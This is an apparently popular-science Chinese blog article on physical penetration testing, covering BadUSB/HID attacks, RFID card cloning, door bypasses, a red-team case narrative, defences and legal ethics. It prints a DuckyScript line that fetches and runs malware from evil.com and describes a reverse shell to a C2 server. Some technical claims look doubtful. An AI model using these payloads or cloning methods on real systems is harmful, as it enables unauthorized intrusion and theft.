物理渗透入门:BadUSB、HID 攻击、门禁绕过科普

📅 2026/8/26 15:46:48
物理渗透入门:BadUSB、HID 攻击、门禁绕过科普
文章目录第一章当键盘拥有了灵魂——HID攻击与BadUSB的前世今生1. HID攻击的核心逻辑披着羊皮的狼2. 从 Teensy 到 Rubber Ducky武器的进化史3. BadUSB的诞生降维打击的狂欢4. 实战进阶Digispark 与 ESP 系列的微型化5. HID 攻击的防守难点与痛点第二章物理壁垒的崩塌——门禁绕过科普与实战拆解1. 门禁系统的本质与分类2. RFID 基础低频与高频的恩怨情仇3. 低频卡克隆最简单粗暴的物理后门4. 高频卡破解M1卡的坠落5. 门禁物理绕过不破门的智慧第三章协同作战——一个完整的红队物理渗透案例复盘第四章物理安全的病理学分析与救赎1. “便利性”与“安全性”的永恒死结2. 边界信任模型的滥用3. 供应链与标准化之痛4. 摄像头的虚假安全感5. 防御的对策在哪里第五章红线、法律与黑客伦理在这个云计算、AI防御、零信任架构满天飞的时代很多企业花了上千万采购高级的防火墙、态势感知平台和端点检测与响应EDR系统。他们的逻辑边界看起来坚不可摧甚至连最狡猩的APT组织都很难在网络层面讨到便宜。但就在三天前我带着一套不到两千块钱的设备堂而皇之地走进了他们安保级别最高的核心机房把一个装有恶意脚本的U盘插进了一台域控服务器的备用终端。这就是物理渗透的魅力也是网络安全中最脆弱的一环——人、物理环境与底层硬件。在这篇文章里我将尽量摒弃那些枯燥的教科书式说教用实战玩家的视角为你揭开物理渗透中三个最经典、也最致命的武器库BadUSB与HID攻击、RFID门禁绕过以及它们是如何在真实世界中协同作战的。这是一篇科普也是一份实战备忘录。第一章当键盘拥有了灵魂——HID攻击与BadUSB的前世今生在讲BadUSB之前我们必须先理解一个概念HIDHuman Interface Device人机接口设备。你的鼠标、键盘、游戏手柄都属于HID。计算机操作系统在设计之初为了即插即用的便利性对HID设备有一种天然的“信任”。当电脑识别到一个设备是键盘时它会毫不犹豫地接收这个键盘输入的每一个字符因为操作系统默认键盘就是让人敲击的它怎么可能自己去打字呢然而黑客的思维方式就是打破“默认”。1. HID攻击的核心逻辑披着羊皮的狼HID攻击的核心逻辑极其简单伪装。我们让一个看起来像U盘的设备插进电脑但电脑识别到的并不是一个存储设备而是一个标准键盘。接着这个“键盘”会以极快的速度通常比人类打字快几百倍自动输入一串预编程的指令从而完成下载木马、创建后门、提权等操作。整个过程不需要网络连接不需要绕过防火墙甚至不需要绕过U盘 autorun自动播放的限制因为操作系统根本没把它当U盘看。它就是实实在在的“敲击”键盘。从防守方的角度来看EDR系统可能看到powershell.exe进程被启动了但它溯源上去会发现父进程是键盘输入。这就让防守方非常头疼你总不能把所有通过键盘输入启动的进程都拦截吧2. 从 Teensy 到 Rubber Ducky武器的进化史早年间安全研究人员使用 Teensy 这种可编程单片机来进行HID攻击。你需要懂 C 语言需要翻看厚厚的数据手册还要自己处理 USB 协议栈。门槛极高属于极客圈子的玩具。直到 Hak5一家著名的网络安全硬件设备公司推出了USB Rubber Ducky橡皮鸭HID攻击才真正走入大众视野。橡皮鸭的伟大之处在于它创造了一种名为 DuckyScript 的简单脚本语言。比如你想让电脑打开运行框并下载一个木马DuckyScript 长这样DELAY 1000 GUI r DELAY 500 STRING powershell -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile(http://evil.com/malware.exe, $env:TEMP/m.exe); Start-Process $env:TEMP/m.exe ENTER这段代码的意思是等待1秒让系统识别设备按下Win键和R键打开运行框等待0.5秒输入一串隐藏窗口的PowerShell命令下载并运行木马最后按下回车。只需两三秒钟攻击完成。3. BadUSB的诞生降维打击的狂欢2014年 Black Hat 大会上Jakob Lell 和 Karsten Nohl 搞出了个大新闻。他们发现很多普通的 USB 控制器芯片特别是基于 Phison 群联 PS2303/PS2401 芯片的U盘其固件是可以被重新编程的。这意味着什么这意味着你不需要花几十美金去买专门的橡皮鸭你只需要去电子市场花20块钱买个普通的金士顿U盘刷入恶意固件它就瞬间变成了一个BadUSB。相比 Rubber DuckyBadUSB 更加隐蔽。它外观上就是一个再普通不过的U盘甚至里面还能正常存储文件。你可以把它故意扔在目标公司的停车场或者大厅里。某个贪小便宜的员工捡起来插进自己的电脑想看看里面有什么资料。就在电脑“滴”一声识别出U盘的那一瞬间固件层面已经发生劫持它瞬间伪装成键盘敲下一连串指令。等屏幕上真正弹出U盘的文件夹时后门已经装好了。4. 实战进阶Digispark 与 ESP 系列的微型化到了今天HID攻击的硬件已经发展得极其变态。如果你拿着一个橡皮鸭去前台登记保安可能一眼就能看出那个塑料壳不对劲。于是出现了Digispark attitude88。Digispark 是基于 ATtiny85 芯片的微型开发板它比你的拇指甲还小只需几块钱人民币就能买到。你可以把它塞进看似普通的鼠标线缆里或者直接改装进目标公司提供的白板笔底座中。更进一步随着物联网的发展ESP32-S2 等带有 WiFi 功能的芯片被引入了 HID 领域。这就是所谓的WiFi Ducky。传统的 HID 设备脚本在植入前就写死了而 WiFi Ducky 允许攻击者在设备插入目标电脑后通过手机连接该设备的 WiFi 热点实时下发指令、修改脚本。这赋予了攻击者极大的灵活性可以根据目标电脑屏幕上的实时反馈来调整攻击策略。5. HID 攻击的防守难点与痛点为什么在2026年的今天HID 攻击依然防不胜防底层信任难打破如前所述操作系统对键盘的信任是骨子里的。速度极快脚本执行速度远超人类反应。攻击发生时即便用户盯着屏幕也只觉得屏幕闪了一下。混淆视听很多高级 BadUSB 脚本会刻意限制输入速度加入随机的按键延迟或者先输入一些正常的字符以此欺骗行为分析软件。EDR 的行为分析引擎通常依靠“极快输入”这一特征来拦截一旦速度变得像人一样拦截就失效了。社会工程学加成捡U盘这种事利用的是人性贪婪防不胜防。第二章物理壁垒的崩塌——门禁绕过科普与实战拆解当你成功通过 BadUSB 拿到内网权限后你会发现有些区域是网络触及不到的。比如机房、财务室、研发中心。这些地方通常被厚重的铁门和严密的门禁系统把守。门禁系统是物理安全的核心但讽刺的是大部分门禁系统本身的安全性极其薄弱。1. 门禁系统的本质与分类门禁系统说到底就是一个电子锁。控制它开和关的通常是基于以下几种识别技术刷卡型RFID/磁卡最常见通过读卡器读取卡片信息。密码型通过键盘输入密码。生物识别型指纹、人脸、虹膜。近两年流行指静脉识别。多重认证型刷卡密码或人脸指纹。在实战中我遇到过最多的是 RFID 刷卡门禁其次是刷卡密码最后才是纯生物识别因为生物识别成本高且存在隐私问题通常只部署在极核心区域。针对 RFID 门禁的绕过是物理渗透必修的内功。2. RFID 基础低频与高频的恩怨情仇RFID射频识别分很多频段门禁卡主要涉及低频125kHz和高频13.56MHz。低频卡125kHz这是最老、最不安全的门禁卡常见于老旧小区、早期企业门禁。典型代表是 EM410x 系列卡也就是以前常见的黄圈白卡或者钥匙扣卡。低频卡的特点是“只读”。卡里面只存了一串不可更改的数字 ID。读卡器读到这串数字传给门禁控制器控制器比对数据库里有这串数字就开门。这就带来一个极其致命的漏洞这串数字是可以被完美复制的。高频卡13.56MHz这是目前主流门禁使用的卡典型代表是 Mifare 系列。Mifare ClassicM1卡曾经统治市场的王者。它不仅有唯一的 UID里面还有扇区可以存储数据并且使用了 Crypto-1 加密算法。但在十几年前德国黑客解密了它的加密算法导致 M1 卡的安全性轰然崩塌。现在针对 M1 卡的破解工具泛滥成灾。CPU卡Mifare Plus / DESFire 等真正安全的卡片内置微处理器采用动态加密机制每次通信的密钥都在变。实战中极难破解只能从其他层面如后端数据库、门禁控制器逻辑找突破口。3. 低频卡克隆最简单粗暴的物理后门对于 EM410x 这种低频卡实战中我用得最多的是 Proxmark3或者更便宜的亲民版 PM3 Easy。这玩意儿简直是一个物理渗透的瑞士军刀。操作极其简单开启 Proxmark3 的低频嗅探模式拿着目标员工的卡在读卡器上刷一下或者在背后贴一下如果你离得足够近。Proxmark3 会立刻把这串 64 位的 ID 显示在屏幕上。接着拿出一张空白的 T5577 可写白卡把这串 ID 写进去。一张拥有完全相同权限的门禁卡就诞生了。你可能会问我去哪里弄到目标员工的卡这就需要一点社会工程学了。在实战中我经常混入目标公司的吸烟区或者楼下的星巴克。很多员工在休息时喜欢把工牌挂在脖子上或者放在桌子上。只要我装作系鞋带或者借个火手机背部贴着一张隐形的高频/低频读取贴片在他工牌附近扫过半秒钟卡号就到手了。这种攻击被称为“无线扒窃”。4. 高频卡破解M1卡的坠落如果目标企业用的是 M1 卡事情会稍微复杂一点点但在强大的工具面前依然脆弱不堪。M1 卡有一个致命弱点它的每个扇区都有独立的密钥A密钥和B密钥。如果不知道密钥你读不出里面的数据。但现实中绝大多数门禁供应商在安装时为了省事都使用了默认密钥比如全F或者众所周知的公开密码。所以第一步是利用漏洞嗅探密钥。Proxmark3 或 ACR122U 可以通过一种叫 Nested 攻击或 Darkside 攻击的技术利用 M1 卡芯片逻辑设计的缺陷在几秒钟到几分钟内暴力破解出密钥。破解出密钥后我们可以读出卡片的所有数据。这时候又分两种情况普通 M1 卡直接把整张卡的数据克隆到一张“UID卡”上。UID卡是可以改底号的完美绕过普通门禁的验证。带防火墙的读卡器一些高级读卡器能识别出你用的是不是官方原厂卡。这时候我们需要用到“魔法卡”Gen2卡/Magic S50这种卡在底层硬件上模仿原厂卡连防火墙都能骗过。直接全盘克隆即可大摇大摆进门。5. 门禁物理绕过不破门的智慧如果遇到的是 CPU 卡或者纯生物识别人脸识别破不了怎么办好办不破门就是了。物理渗透的核心思维是寻找系统中最薄弱的环节。门禁系统不仅包含读卡器还包含锁体、门磁、控制器、出门按钮、甚至门框的设计。A. 出门按钮劫持门禁系统设计上有一个安全悖论为了消防逃生进门需要刷卡但出门通常只需要按一下墙上的开关。这个开关通常是常开型NO或常闭型NC的干接点。如果在门外我们只要顺着门缝塞进一根特制的金属线或者用一块强磁铁贴在出门按钮对应的位置利用电磁感应触发内部开关门就开了。目前市面上有很多针对推杆锁的“磁力开锁器”几秒钟就能无声无息地把门弹开。B. 门缝工具Under-the-Door Tools这是最经典的电影桥段。很多双开门或带有较大门缝的机房门门内有提手或下压式开门锁。攻击者只需将一根带有鱼线的细长金属杆从门缝塞进去套住内部把手向外一拉门就开了。为了对付这种攻击有些门装了防插挡片Aldo plate。但在实战中很多防插挡片安装不牢固或者对于特定角度的弯曲工具依然无效。C. RFID 中继攻击Relay Attack这招极其炫酷。目标公司的人脸识别或高级门禁可能无法克隆但只要它是基于无线射频通信的比如蓝牙手机开门、高级感应卡就可以用中继攻击。我在门外放一个天线接收器同伙在目标公司内部拿着另一个天线靠近真正有权限的员工比如尾随他进电梯。门外的接收器伪装成卡片与门禁读卡器通信门内的天线伪装成读卡器与真卡通信。中间通过4G/5G或Wi-Fi网络实时传输加密信号。门禁系统以为真卡就在门外直接开门。这种攻击在高端车锁破解上非常常见如今也被应用在了高级别物理渗透中。第三章协同作战——一个完整的红队物理渗透案例复盘为了让你更直观地感受到这些技术是如何像齿轮一样咬合在一起的我用今年初的一场真实红队评估已脱敏来还原这个过程。目标一家大型研发中心位于某高新科技园内的一栋独立大楼。四周有围墙和绿化带一楼大厅有保安和闸机2楼以上为研发区机房在3楼门禁为高级M1卡指纹双因素认证。网络边界极严VPN接入门户只有单点登录且需硬件令牌。正面强攻网络无望客户要求我们进行物理渗透目标是拿到核心机房的一台测试服务器权限。第一阶段踩点与社会工程学我花了两天时间在目标周围转悠。发现早上8:30-9:00是高峰期大量员工涌入。闸机是摆闸有一定缝隙。保安主要盯着前台登记对尾随现象防备心不强。员工脖子上挂着工牌上面有RFID卡套。第二天早上8:15我穿着某外卖平台的黄色制服非目标公司规定服装但在办公楼宇中极具伪装性戴着头盔手里提着两杯奶茶和一袋打印纸走向闸机。我假装腾不出手刷脸在闸机口徘徊。正好有一位男员工刷卡进入摆闸打开的一瞬间我侧身挤了进去嘴里说着“借过借过外卖快超时了”。保安只是瞥了我一眼没做声。进入大厅后我立刻走向消防楼梯间。避开电梯里的摄像头前期踩点发现电梯监控有死角我爬向3楼。第二阶段门禁绕过——从物理到逻辑到了3楼消防通道门前这是一扇常闭防火门需要内部人员按下出门按钮才能打开或者从外侧刷卡。我没有卡。但我前期在 GitHub 和暗网上搜集到了该大楼物业管理系统泄露的几条信息推测他们使用的是某国产廉价门禁系统。我从口袋里掏出一个 PM3 Easy。很多老式门禁系统的出门按钮信号线和读卡器信号线走的是同一根弱电线管且防破解设计极差。我将 PM3 的天线贴在门框读卡器附近嗅探高频信号。3楼内部此时没有人员走动但读卡器每隔一段时间会发出轮询信号。我并不需要真正破解门禁我需要的是触发一次系统错误重置。通过向读卡器发送特定格式的畸形 M1 卡数据包类似网络层面的 SQL 注入该国产门禁的控制器处理逻辑发生溢出直接进入了“调试维护模式”以保持开门状态这是该门禁系统的一个已知0-day漏洞在之前的内部漏洞库中有记录。门“咔哒”一声开了。我顺利进入3楼走廊。第三阶段HID攻击的惊险一跃此时我已在研发区外围。但真正的核心机房在3楼尽头那里不仅有刷卡指纹双因素门禁还有24小时无死角监控。如果硬闯机房门必然触发警报。我需要换个思路。我退回2楼这里是行政和HR办公区。走廊里空无一人但有些工位上的电脑还亮着屏幕处于锁屏状态。这正是绝佳的机会。走到一个贴着“网络运维主管”铭牌的工位前电脑锁屏提示输入密码。我从袖口抽出一个小巧的 Digispark。这玩意儿被我伪装成了一个普通的蓝牙接收器外观。我拔下原电脑上的无线鼠标接收器将我的 Digispark 插进 USB 口。电脑“滴”一声。不到两秒钟Digispark 伪装成键盘敲下了我预置的脚本。脚本逻辑极其精妙它并没有试图去破解锁屏密码而是调出辅助功能由于锁屏状态下某些快捷键依然可用。触发一个系统自带的计算器漏洞或粘滞键后门取决于系统版本此处通过修改sethc.exe为cmd.exe的经典变体结合现代绕过技术实现。在不解除锁屏的情况下以 SYSTEM 权限后台启动一个 PowerShell反向连接到我的云端 C2Command and Control服务器。拔下 Digispark插回原来的鼠标接收器恢复现场。整个过程不到15秒。第四阶段横向移动与收割我退回楼梯间打开笔记本发现 C2 服务器上已经亮起了一个上线 beacon。这台处于锁屏状态的运维主管电脑现在被我完全控制了。它以极高的权限运行在域内可以访问内部的配置中心。通过这台电脑我拿到了机房门禁系统的管理后台账号就保存在运维的浏览器明文密码本里。接着我远程登录门禁管理后台不仅将一张准备好的空白 M1 卡注册为最高权限卡还顺手关闭了机房内部的两个摄像头。再次回到3楼拿手机刷了一下刚才在后台授权的卡。机房门禁的绿灯亮起。推开这扇沉重的大门一排排服务器闪烁的指示灯映入眼帘。我找到那台目标测试服务器插上键盘直接在控制台登录后台查到的账号密码拿走了需要的数据。撤离大楼时依然穿着外卖服大摇大摆地走出大门。第四章物理安全的病理学分析与救赎上面的案例听起来像好莱坞电影但这就是红队物理渗透的日常。企业为什么在物理安全上如此脆弱原因可以归结为以下几点1. “便利性”与“安全性”的永恒死结企业采购门禁系统首要目的是让员工顺畅通行其次才是防盗。如果为了安全要求员工每次进门都要输入16位动态密码刷脸按指纹HR部门会先于黑客把CISO首席信息安全官炒掉。所有的物理安全妥协本质上都是为了业务运转效率。门禁的防尾随设计如互锁通道、单次通行限制成本极高大多数企业不愿承担。2. 边界信任模型的滥用不仅是网络有边界信任物理世界更严重。一旦你通过了大门这道边界进入了内部办公区所有的内网电脑都对你卸下防备。我们在测试中经常发现员工电脑的锁屏时间被设置为30分钟甚至更长并且很多高权限工位就在公共区域。这种“一旦进门就是自己人”的思维定势是物理渗透得逞的温床。3. 供应链与标准化之痛全世界的门禁卡芯片就那么几家在生产。Hack5 或者其他安全研究团队的每一次漏洞披露都会导致成千上万家企业的门禁系统面临风险。很多物业采购员甚至不知道 M1 卡早就被破解了他们依然在淘宝上大批量采购最便宜的可写白卡。供应商自己为了调试方便留下的后门密码如255255或000000更是物理渗透的巨大富矿。4. 摄像头的虚假安全感很多老板觉得装了360度无死角的监控就万事大吉。但监控是事后的它不能在攻击发生的那一瞬间进行阻断。更何况像我案例中那样只要掌握了监控后台权限或者利用一些物理死角监控就形同虚设。更别提很多监控系统的弱口令问题比门禁还严重。5. 防御的对策在哪里要彻底抵御物理渗透没有银弹。但可以通过一系列组合拳极大提高攻击成本硬件层面淘汰所有低频卡和老式M1卡全面升级为 CPU 卡或采用手机 NFC 虚拟门禁结合动态令牌。门禁读卡器必须开启防火墙检测异常卡号。机房等重点区域必须使用真正的双重认证刷卡生物识别且生物识别需具备活体检测。逻辑层面USB 端口管控是重中之重。使用 Endpoint Encryption 或专门的 USB 管控软件对外接 HID 设备进行白名单认证比如只允许特定 VID/PID 的键盘接入或者接入任何键盘前需输入域账号密码解锁端口。但注意这会遭到员工的抱怨需要管理层强力推行。物理环境设计遵循 CPTED通过环境设计预防犯罪原则。防尾随三辊闸、全高闸机、机房双开门互锁、门缝防插挡片等硬件设施必不可少。防插挡片不应是贴在门上的塑料片而应是和门框一体成型的金属结构。人员意识永远是最核心的一环。训练前台保安识别尾随训练员工不要插陌生U盘建立“看到陌生人就上前询问”的企业文化。哪怕让人感觉有些不近人情也是值得的。第五章红线、法律与黑客伦理写下这些技术细节时我内心是有些忐忑的。我们在这个圈子里摸爬滚打常在边缘游走。必须明确一切未经授权的物理渗透测试和破解行为在法律上等同于非法入侵住宅或破坏计算机信息系统罪。中国的《网络安全法》、《刑法》第285、286条对这一块的规定极其严格。哪怕你只是出于好奇捡了个BadUSB插进了别人的电脑哪怕没偷东西只要木马上线了这就构成了犯罪。作为一名合法的红队评估师我们在执行任务前必须有极其严苛的法律文书。授权书上必须明确写清楚测试的时间段精确到某月某日某时、物理测试的具体楼层和区域、若造成业务中断的免责条款、以及“紧急叫停”机制。在测试过程中哪怕看到保安打瞌睡也不能去撬保险柜因为那超出了“网络/信息系统”的授权范围变成了物理盗窃性质完全变了。黑客精神的核心从来不是破坏而是对“事物运作原理”的极致好奇以及寻找规则漏洞的智力狂欢。当黑客技术被正义地使用时它就是企业安全的听诊器。当我们用 BadUSB 和 Proxmark3 “攻击”客户时是为了在真正的勒索软件团伙或商业间谍到来之前帮他们把门修好.网络安全是一场没有终点的猫鼠游戏。防御方在筑墙攻击方就在找砖缝。只要人还需要用手去开门只要电脑还需要用键盘去输入这种物理层面的博弈就永远不会停止。